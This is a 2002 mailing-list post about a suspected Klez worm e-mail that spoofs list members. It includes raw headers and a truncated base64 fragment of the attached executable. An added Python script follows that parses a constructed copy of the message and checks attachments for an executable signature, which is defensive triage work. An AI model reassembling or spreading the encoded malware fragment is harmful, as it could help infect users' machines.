Date: Fri, 26 Jul 2002 00:16:57 +0000
From: "Matthew Hanson" <[EMAIL PROTECTED]>
Subject: A powful tool
I wonder how many other people on the list are getting these emails. It would be interesting if someone who HAS posted to the list in the past few months, HASN'T received one of these emails.

Today I get yet another probable virus attack. This time it's supposedly from David Chien. The return address is "adorablelibretto <[EMAIL PROTECTED]>", which is a pretty close variant of the "David Chien <[EMAIL PROTECTED]>" he uses to post here. The subject looks familiar, but with a couple of typos: "A powful tool". If it is a virus, I'm guessing it's specifically making the typos in the subject to appear more 'believable'.

Though posted through the same Israeli ISP, netvision.net.il, it seems to have originated from Sctrsrvc ([62.0.147.50]):

Received: from Sctrsrvc ([62.0.147.50]) by mxout2.netvision.net.il

Yesterday's originated from Arop ([62.0.150.217]):

Received: from Arop ([62.0.150.217]) by mxout3.netvision.net.il

Doing quick research into IP and DNS addresses, it would seem that "Sctrsrvc" probably represents the user name of the email account, and ([62.0.147.50]) most likely a dynamic IP address that person was given when logged into the netvision.net.il server. Does that sound right?

The attachment here is StartStatis[1].exe, and the two from the previous post were Jfcaq.scr and leshonit[1].jpg. From what I've read, certain Klez variants create random file names when they re-send the virus.

It's interesting that Hotmail does not indicate there are any attachments to these emails. But I found info on a Klez variant specifically targeted at Outlook (surprise, surprise!) that doesn't display attachments in some mail readers other than Outlook.

But from what Pres says, and from what I've been reading... Klez gets its email addresses from address books. Is it likely that Pres's, David's, and my email address are in someone's address book who has an internet account with this Israeli ISP?
Info from this site may explain: http://membrane.com/security/computer_viruses/viri_and_email_harvesting.html

It would seem that code from SPAM email address harvesting software has been combined with new virus software to gather email addresses from browser caches and websites. So it could very well be that Dan's and the new searchable archive websites (Mike's isn't registered, and doesn't come up in any searches I've done) have been harvested. And perhaps members with the most posts are selected as phony senders of the virus to the rest of the list. It would be interesting if someone who HAS posted to the list in the past few months, HASN'T received one of these emails.

M(S)
(Not necessarily paranoid, just very curious and cautious)

PS: Wonder if it's just coincidence that viruses seem to be appearing in increasingly larger numbers since the events at the WTC.

ASCII source with HTML (hopefully) disabled this time:
----------------------------------------------------------
Received: from mxout2.netvision.net.il ([194.90.9.21]) by mc2-f15.law16.hotmail.com with Microsoft SMTPSVC(5.0.2195.4905); Thu, 25 Jul 2002 04:08:27 -0700
Received: from Sctrsrvc ([62.0.147.50]) by mxout2.netvision.net.il (iPlanet Messaging Server 5.2 HotFix 0.8 (built Jul 12 2002)) with SMTP id <[EMAIL PROTECTED]> for [EMAIL PROTECTED]; Thu, 25 Jul 2002 14:08:18 +0300 (IDT)
Date: Thu, 25 Jul 2002 14:07:51 +0300 (IDT)
Date-warning: Date header was inserted by mxout2.netvision.net.il
From: adorablelibretto <[EMAIL PROTECTED]>
Subject: A powful tool
To: [EMAIL PROTECTED]
Message-id: <[EMAIL PROTECTED]>
MIME-version: 1.0
Content-type: multipart/alternative; boundary="Boundary_(ID_ZSYUym9rAolQX13Ma7pqrA)"
Return-Path: [EMAIL PROTECTED]
X-OriginalArrivalTime: 25 Jul 2002 11:08:27.0586 (UTC) FILETIME=[9A0F3220:01C233CB]

--Boundary_(ID_ZSYUym9rAolQX13Ma7pqrA)
Content-type: text/html
Content-transfer-encoding: 7BIT

<.HTML><.HEAD><./HEAD><.BODY>
<.FONT>This is a powful tool<.br>
I hope you would like it.<./FONT><./BODY><./HTML>

--Boundary_(ID_ZSYUym9rAolQX13Ma7pqrA)
Content-id: <Rw331Ge5F0KJ>
Content-type: application/octet-stream; name="StartStatis[1].exe"
Content-transfer-encoding: base64
Content-disposition: attachment; filename="StartStatis[1].exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
.....<snip>.....
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=9
--Boundary_(ID_ZSYUym9rAolQX13Ma7pqrA)--

**************************************************************
http://libretto.basiclink.com - Libretto mailing list
http://www.silverace.com/libretto/ - Archives
**************************************************************
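The triage the post does by hand (walk the Received: chain back to the first hop, list the attachments, notice that the base64 payload starts with "TVqQ", i.e. an MZ header) can be automated with the standard library. The following is an added Python example, not code from the original post or the list. The message it parses is constructed: the header layout mirrors the headers quoted above, but the addresses are example.invalid placeholders, the Message-id is a dummy, and the attachment is a fake MZ stub built inline, not the real sample. The "bare hostname means a client submission" rule is my heuristic, not something the post or the headers prove.

```python
"""Triage a suspicious e-mail: Received: chain, attachments, MZ check.

Added example. The message below is CONSTRUCTED to resemble the headers quoted
in the post; addresses and the attachment bytes are placeholders.
"""
import base64
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed stand-in for an EXE attachment: a 64-byte DOS header with
# e_lfanew at offset 0x3c, followed by the classic DOS stub text. Only the
# first bytes are inspected, so this is enough to exercise the checks.
FAKE_EXE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"\x00" * 44
    + b"\xd8\x00\x00\x00"                               # e_lfanew = 0xd8
    + b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
    + b"This program cannot be run in DOS mode.\r\r\n$"
    + b"\x00" * 64
)

# Constructed raw message; header order and structure follow the post.
RAW_TEMPLATE = """\
Received: from mxout2.netvision.net.il ([194.90.9.21]) by mc2-f15.law16.hotmail.com with Microsoft SMTPSVC(5.0.2195.4905); Thu, 25 Jul 2002 04:08:27 -0700
Received: from Sctrsrvc ([62.0.147.50]) by mxout2.netvision.net.il (iPlanet Messaging Server 5.2) with SMTP id <dummy-id@mxout2.netvision.net.il> for victim@example.invalid; Thu, 25 Jul 2002 14:08:18 +0300 (IDT)
From: adorablelibretto <sender@example.invalid>
Subject: A powful tool
To: victim@example.invalid
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="B1"

--B1
Content-Type: text/html
Content-Transfer-Encoding: 7bit

<HTML><BODY>This is a powful tool</BODY></HTML>
--B1
Content-Type: application/octet-stream; name="StartStatis[1].exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="StartStatis[1].exe"

{b64}
--B1--
"""

HOP_RE = re.compile(r"from\s+(\S+)\s+\(\[?([\d.]+)\]?\)\s+by\s+(\S+)", re.I)


def load_sample() -> EmailMessage:
    """Build the constructed message and parse it with the modern policy."""
    b64 = base64.encodebytes(FAKE_EXE).decode("ascii")
    return email.message_from_string(RAW_TEMPLATE.format(b64=b64), policy=policy.default)


def parse_received(msg: EmailMessage):
    """Return (claimed_host, ip, receiving_host) per hop, oldest hop first.

    Each relay prepends its own Received: line, so header order is newest-first;
    reversing gives the path the message actually travelled."""
    hops = []
    for hdr in msg.get_all("Received", []):
        m = HOP_RE.search(" ".join(str(hdr).split()))
        if m:
            hops.append(m.groups())
    hops.reverse()
    return hops


def origin_notes(hops):
    """Heuristic (mine, not the post's): a first hop whose name has no domain
    part, handed straight to the ISP's outbound relay, looks like a client
    machine submitting mail directly rather than another MTA."""
    if not hops:
        return ["no parseable Received: headers"]
    host, ip, relay = hops[0]
    notes = []
    if "." not in host:
        notes.append(f"first hop '{host}' is not a FQDN; likely a client machine name")
    notes.append(f"client IP {ip} submitted to {relay}")
    return notes


def attachment_verdicts(msg: EmailMessage):
    """Decode every attachment-like leaf part and test for the MZ signature.

    msg.iter_attachments() is deliberately not used: on a multipart/alternative
    root it returns nothing, because every alternative counts as 'body'. That
    is the same blind spot a mail client has when it renders one alternative."""
    verdicts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if not (part.is_attachment() or part.get_filename()):
            continue
        data = part.get_payload(decode=True) or b""
        verdicts.append({
            "name": part.get_filename() or "(unnamed)",
            "content_type": part.get_content_type(),
            "size": len(data),
            "mz": data[:2] == b"MZ",
            "dos_stub": b"This program cannot be run in DOS mode" in data[:512],
        })
    return verdicts


def triage(msg: EmailMessage) -> dict:
    hops = parse_received(msg)
    return {
        "subject": str(msg["Subject"]),
        "from": str(msg["From"]),
        "container": msg.get_content_type(),
        "hops": hops,
        "origin": origin_notes(hops),
        "attachments": attachment_verdicts(msg),
    }


if __name__ == "__main__":
    for key, value in triage(load_sample()).items():
        print(f"{key}: {value}")
```

Two things the script makes visible that the post only hints at: the executable sits inside a multipart/alternative container rather than multipart/mixed, so a client that picks one alternative to display has a reason to never list the .exe; and the decode check is a first-bytes test only, so a positive MZ result says "this is a Windows executable", not which family it is. Hand anything that trips it to a sandbox rather than drawing conclusions from the header alone.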
